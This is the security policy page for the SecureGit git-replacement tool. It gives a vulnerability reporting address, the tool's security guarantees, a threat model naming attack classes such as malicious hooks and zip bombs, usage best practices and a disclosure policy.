securegit 0.6.1

Zero-trust git replacement with 12 built-in security scanners, universal undo, durable backups, and a 32-tool MCP server
Documentation 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77

# Security Policy

## Reporting a Vulnerability

If you discover a security vulnerability in SecureGit, please report it to:

**Email:** security@armyknifelabs.com

Please include:

- Description of the vulnerability
- Steps to reproduce
- Potential impact
- Suggested fix (if any)

We will respond within 48 hours and work with you to address the issue.

## Security Guarantees

SecureGit provides the following security guarantees:

### Code Acquisition

1. **No automatic code execution** - Hooks, filters, and config scripts cannot run
2. **Sanitized git directories** - All dangerous components removed before use
3. **Validated archives** - Zip bombs, path traversal, and size attacks prevented
4. **Integrity verification** - ZIP contents match git history
5. **Comprehensive scanning** - Multiple security plugins analyze all code

### Outbound Protection

1. **Pre-commit scanning** - Secrets and malware caught before commit
2. **Pre-push scanning** - Final check before code reaches remote
3. **Configurable thresholds** - Set your own security standards

## Threat Model

### In Scope

- Malicious git hooks
- Dangerous git config keys
- Archive-based attacks (zip bombs, path traversal)
- Embedded malware and backdoors
- Exposed credentials in code
- Supply chain attacks via dependencies

### Out of Scope

- Zero-day vulnerabilities in git itself
- Compromised build infrastructure
- Social engineering attacks
- Runtime vulnerabilities in cloned code

## Security Best Practices

1. Always use `--fail-on` in CI/CD pipelines
2. Review findings before approving acquisition
3. Use `--no-history` for untrusted sources if history isn't needed
4. Scan existing repositories with `securegit scan --include-git`
5. Install git hooks to prevent accidental secret commits

## Dependencies

We maintain a minimal dependency tree and regularly audit all dependencies using:

- cargo-audit
- Dependabot
- Manual security reviews

## Disclosure Policy

We believe in responsible disclosure and will:

1. Acknowledge receipt within 48 hours
2. Provide a timeline for fixes
3. Credit researchers (with permission)
4. Publish security advisories for confirmed issues